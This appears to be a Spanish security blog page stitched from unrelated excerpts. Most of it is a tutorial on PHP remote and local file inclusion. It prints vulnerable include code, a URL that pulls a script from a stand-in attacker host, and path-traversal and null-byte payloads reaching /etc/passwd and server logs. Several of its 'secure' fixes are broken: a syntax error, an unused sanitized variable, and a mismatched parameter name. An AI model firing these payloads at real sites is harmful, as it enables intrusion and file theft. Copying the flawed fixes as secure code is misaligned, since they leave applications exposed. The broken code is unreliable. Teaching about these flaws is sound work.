Así que sé la persona inteligente que sé que eres, y celebra el Día Internacional de la Copia de Seguridad como se merece: haciendo una copia de seguridad. ¡Y no te olvides de avisar a tus contactos!

Como veis, siempre según Microsoft, Internet Explorer 9 es el navegador más seguro del mercado, y Firefox 7 y Chrome 14 sólo consiguen superar a IE 7, lanzado en Octubre de 2006. Safari y Opera no parecen ser lo bastante importantes para ser tenidos en cuenta.

Si los argumentos de Randall te convencieron, aquí tienes un muy pequeño y muy tonto script que genera una frase de paso seleccionando aleatoriamente 4 de las 1.000 palabras más utilizadas del castellano. Puedes comprobar la fortaleza de la contraseña utilizando, por ejemplo, la herramienta online de Rumkin.com.

El único sistema verdaderamente seguro es aquél que está apagado, encerrado en un bloque de hormigón, y sellado en una habitación con guardias armados. E incluso así, tengo mis dudas.

~ Gene Spafford

A menudo me preguntan qué puede hacer el usuario medio de Internet para garantizar su seguridad. Mi primera respuesta suele ser: ‘Nada; estás jodido’

– Bruce Schneier

Si no le ves la gracia a ser una posible víctima de este tipo de ataques, puedes empezar por leer nuestro artículo Asegurar una red WiFi.

El Remote File Inclusion, RFI, o inclusión remota de archivos, es un tipo de vulnerabilidad que podemos encontrar en páginas web que no filtran correctamente la información proveniente del usuario. En PHP se puede dar al hacer uso de las construcciones include, include_once, require y require_once, o la función fopen, entre otros, con parámetros procedentes del usuario.

El siguiente código, por ejemplo, por sencillo e inocente que sea, sería altamente vulnerable:

<?php
if(isset($_GET['pagina'])) {
  require $_GET['pagina'];
} else
  die('No se ha especificado la página a mostrar');

¿Por qué es tan peligroso este código? Consideremos que nada le impediría a un supuesto atacante pasar como valor del parámetro pagina la ruta de un script PHP situado en su servidor, haciendo que nuestro servidor ejecutara cualquier código que dicho archivo contuviera.

http://mipaginaweb.com/index.php?pagina=http://haxor.com/script

Para evitar este problema desde PHP 5.2.0 php.ini tiene una opción allow_url_include que controla si se permiten incluir scripts utilizando URLs, opción con valor false por defecto. También existe una opción que controla si se pueden pasar URLs a fopen, allow_url_fopen, que data de PHP 4.0.4 y que, en esta ocasión, sí está activada por defecto (anteriormente esta última opción era la encargada de controlar ambas cosas, por lo que no se podía evitar la inclusión de archivos remotos y a la vez hacer uso de fopen con archivos remotos).

Gracias a esta configuración las vulnerabilidades de inclusión remota de archivos son cada vez menos comunes, aunque todavía tendremos que lidiar con otros ataques menos obvios como el uso de los protocolos data:// y php://, que no se desactivan con allow_url_include, o las vulnerabilidades LFI.

LFI, Local File Inclusion o inclusión local de archivos, es un tipo de vulnerabilidad que un atacante puede aprovechar para tener acceso a archivos locales de nuestro servidor, como el archivo de configuración de nuestra aplicación:

http://mipaginaweb.com/index.php?pagina=conf/configuracion.php

un archivo previamente subido por el atacante, haciendo uso de cualquier formulario de subida de archivos que podamos tener:

http://mipaginaweb.com/index.php?pagina=avatares/script

código insertado en algún log de Apache:

http://mipaginaweb.com/index.php?pagina=../../../var/log/apache/error.log

o incluso el contenido del fichero passwd de un sistema UNIX, si este está mal configurado:

http://mipaginaweb.com/index.php?pagina=../../../etc/passwd

Una posible solución sería añadir una extensión al archivo a incluir, por ejemplo:

<?php require $_GET['pagina'] . '.inc.php'); ?>

En teoría, esto debería impedir incluir cualquier archivo que no terminara en .inc.php, pero, lamentablemente, no es tan sencillo. El atacante podría saltarse nuestro nuevo intento de protección añadiendo el carácter nulo (0×00), que permite terminar las cadenas, al final del valor pasado como parámetro (si magic_quotes_gpc está desactivado, de otra forma el problema se solucionaría al aplicar la función addslashes automáticamente):

http://mipaginaweb.com/index.php?pagina=../../../etc/passwd%00

o se podrían aprovechar los intentos de PHP de normalizar las rutas y el hecho de que las rutas se truncan a partir de cierto tamaño (este problema está corregido en las últimas versiones de PHP, para nuestra tranquilidad):

http://mipaginaweb.com/index.php?pagina=../../../etc/passwd.\.\.\.\ …

Como nunca podremos ir un paso por delante de los hackers, una buena solución, aunque a algunos les podría parecer exagerada, es aceptar sólo los caracteres necesarios en el parámetro pasado como argumento:

<?php
if(isset($_GET['pagina'])) {
	$pagina = preg_replace('/[^a-z^A-Z]*/', '', $_GET['pagina']);
  require $_GET['pagina'] '.inc.php';
} else
  die('No se ha especificado la página a mostrar');

o bien, aunque es poco flexible, almacenar las distintas opciones válidas en un array y comprobar si el valor indicado se encuentra en dicho array:

<?php
$paginas = array('principal', 'sobre-mi', 'contacto');
if(isset($_GET['pagina']) and in_array($_GET['pagina'], $paginas)) {
  require $paginas[array_search($_GET['page'], $paginas)] . '.inc.php';
} else
  die('No se ha especificado la página a mostrar o no existe en el servidor');

Aunque, por supuesto, la mejor solución siempre será, simplemente, no confiar nunca en los usuarios, y, por lo tanto, no incluir nada que un usuario pueda modificar.

Actúa con tus contraseñas como con tu cepillo de dientes. Nunca debes compartirlo, y tienes que sustituirlo cada seis meses.

– Clifford Stoll

Muchas de estas vulnerabilidades se aprovechan de la capacidad de Adobe Reader de ejecutar código JavaScript, por lo os recomendaría desactivarlo inmediatamente desmarcando la casilla “Activar JavaScript para Acrobat” en Edición -> Preferencias -> JavaScript. Igualmente, sería recomendable desactivar la visión de PDF desde el navegador.

También podéis probar un lector de PDF alternativo, como Sumatra PDF. U otro sistema operativo.